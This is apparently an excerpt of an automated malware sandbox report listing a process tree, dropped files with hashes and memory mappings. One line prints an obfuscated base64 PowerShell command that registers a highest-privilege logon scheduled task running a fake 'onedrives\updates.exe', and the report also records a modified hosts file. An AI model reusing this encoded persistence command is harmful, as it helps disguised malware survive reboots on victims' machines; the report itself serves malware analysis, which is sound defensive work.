C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "stopjduuhfz"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e6619990ab7c79dcb1fe7045a6861a7c
SHA1f8754f704578daa26fd0dc9366f6b7f9d180db5d
SHA256beb6855c38d42db6f2f1f149a09970eea6aa664f145f6aedb3b87ae828411fc2
SHA51299fc5258f0fdda9cd5b194d2083749a1d53cccf705db479822320bc0c53b1c31ad2ff07bcb089f63fbe03545f2bf3935fc61f96ade33f312eb7cbb1292c6a82d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD528da6537d68cf570ec313d03c9228b32
SHA181304f69af0b76047d4f55092f7c72ef8720b1bf
SHA2568e193bae02f49ba784cd37e6e1ca2f4a91dc1043f58f7b06300f809404ed7c02
SHA512ab3f7a20b77fe421afe5ef26018db37423af483dab2f097179a1cf68736ca274ff8d16dcf0f514e7e561a8e28275d20ca5e195b19a58b654c60f2a7b1dd67f58
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD565a15f6c9464167c6e8ac1ab275e8f2a
SHA150d77247b262e76f0ad3551d7c29d2464b11a082
SHA2562e469156f4329c3ffab494824102dd2f715e4753f62cfcb69db154394d88eb58
SHA512d5290b8506e8d29f952e119a3f1c77d02b94996803a9f238ebc39e686312e1f7fb8b70443a9f12c5aaf7acfb15532b8c585493534a61c22f6579a5ebddc8ae69
-
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exeFilesize
2.2MB
MD5d5dfb8447ced11274942ace31b4279d8
SHA15a1b36ef9db72321b3d075712a8888bd921a472c
SHA2565ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
SHA51292db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
-
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exeFilesize
2.2MB
MD5d5dfb8447ced11274942ace31b4279d8
SHA15a1b36ef9db72321b3d075712a8888bd921a472c
SHA2565ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
SHA51292db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
-
C:\Windows\system32\drivers\etc\hostsFilesize
5KB
MD50684960f1127625c7a987862df0a9047
SHA18827566f52b386062aee1cb853a91bede04299b2
SHA256c10285503e78eacbaa3c00e31a8811afbeaaa07049cc650b6ce961164ba497da
SHA512143cf0a46f6afda8e796eebf3be8e08fbc8c46c45236988ef678aa3f0d1e4ba44130fbd3d63e5abff4e4419f006f378f2a5dc2ef3b152524502c489fa32d2401
-
memory/416-216-0x0000000000000000-mapping.dmp
-
memory/512-215-0x0000000000000000-mapping.dmp
-
memory/852-221-0x0000000000000000-mapping.dmp
-
memory/896-214-0x0000000000000000-mapping.dmp
-
memory/1108-219-0x0000000000000000-mapping.dmp
-
memory/1184-297-0x0000000000000000-mapping.dmp
-
memory/1232-178-0x0000000000000000-mapping.dmp
-
memory/1240-218-0x0000000000000000-mapping.dmp
-
memory/1300-162-0x0000000000000000-mapping.dmp
-
memory/1476-220-0x0000000000000000-mapping.dmp
-
memory/1604-160-0x0000000000000000-mapping.dmp
-
memory/1668-163-0x0000000000000000-mapping.dmp
-
memory/1732-298-0x0000000000000000-mapping.dmp
-
memory/1788-126-0x0000023D53EE0000-0x0000023D53F56000-memory.dmpFilesize
472KB
-
memory/1788-118-0x0000000000000000-mapping.dmp
-
memory/1788-123-0x0000023D53D30000-0x0000023D53D52000-memory.dmpFilesize
136KB
-
memory/1932-305-0x0000000000000000-mapping.dmp
-
memory/1992-262-0x0000000000000000-mapping.dmp
-
memory/2000-164-0x0000000000000000-mapping.dmp
-
memory/2000-299-0x0000000000000000-mapping.dmp
-
memory/2104-272-0x0000000000000000-mapping.dmp
-
memory/2108-263-0x0000000000000000-mapping.dmp
-
memory/2272-300-0x0000000000000000-mapping.dmp
-
memory/2492-257-0x0000000000000000-mapping.dmp
-
memory/2716-117-0x000000001C580000-0x000000001C79A000-memory.dmpFilesize
2.1MB
-
memory/2716-116-0x00000000003D0000-0x0000000000604000-memory.dmpFilesize
2.2MB
-
memory/2848-256-0x0000000000000000-mapping.dmp
-
memory/3040-159-0x0000000000000000-mapping.dmp
-
memory/3260-207-0x0000000000000000-mapping.dmp
-
memory/3328-311-0x0000000000000000-mapping.dmp
-
memory/3368-282-0x0000000000000000-mapping.dmp
-
memory/3424-306-0x0000000000000000-mapping.dmp
-
memory/3472-158-0x0000000000000000-mapping.dmp
-
memory/3592-154-0x0000000000000000-mapping.dmp
-
memory/3728-277-0x0000000000000000-mapping.dmp
-
memory/3736-206-0x0000000000000000-mapping.dmp
-
memory/3788-260-0x0000000000000000-mapping.dmp
-
memory/3864-259-0x0000000000000000-mapping.dmp
-
memory/4060-157-0x0000000000000000-mapping.dmp
-
memory/4072-310-0x0000000000000000-mapping.dmp
-
memory/4144-205-0x0000000000000000-mapping.dmp
-
memory/4172-184-0x0000000000000000-mapping.dmp
-
memory/4180-313-0x0000000000000000-mapping.dmp
-
memory/4184-312-0x0000000000000000-mapping.dmp
-
memory/4192-183-0x0000000000000000-mapping.dmp
-
memory/4208-314-0x0000000000000000-mapping.dmp
-
memory/4224-275-0x0000000000000000-mapping.dmp
-
memory/4320-322-0x0000023981490000-0x0000023981496000-memory.dmpFilesize
24KB
-
memory/4320-325-0x00000239811B0000-0x00000239811C1000-memory.dmpFilesize
68KB
-
memory/4320-320-0x0000023981470000-0x0000023981482000-memory.dmpFilesize
72KB
-
memory/4388-173-0x0000000000000000-mapping.dmp
-
memory/4436-156-0x0000000000000000-mapping.dmp
-
memory/4440-308-0x0000000000000000-mapping.dmp
-
memory/4440-171-0x0000000000000000-mapping.dmp
-
memory/4460-213-0x0000000000000000-mapping.dmp
-
memory/4468-177-0x0000000000000000-mapping.dmp
-
memory/4508-210-0x0000000000000000-mapping.dmp
-
memory/4548-212-0x0000000000000000-mapping.dmp
-
memory/4584-323-0x0000000001350000-0x0000000001362000-memory.dmpFilesize
72KB
-
memory/4584-315-0x0000000001320000-0x000000000132A000-memory.dmpFilesize
40KB
-
memory/4652-204-0x0000000000000000-mapping.dmp
-
memory/4676-217-0x0000000000000000-mapping.dmp
-
memory/4684-211-0x0000000000000000-mapping.dmp
-
memory/4784-261-0x0000000000000000-mapping.dmp
-
memory/4800-271-0x0000000000000000-mapping.dmp
-
memory/4808-264-0x0000000000000000-mapping.dmp
-
memory/4884-265-0x0000000000000000-mapping.dmp
-
memory/4928-161-0x0000000000000000-mapping.dmp
-
memory/4968-309-0x0000000000000000-mapping.dmp
-
memory/5004-174-0x0000000000000000-mapping.dmp
-
memory/5040-155-0x0000000000000000-mapping.dmp
-
memory/5100-266-0x0000000000000000-mapping.dmp
-
memory/5104-169-0x0000000000000000-mapping.dmp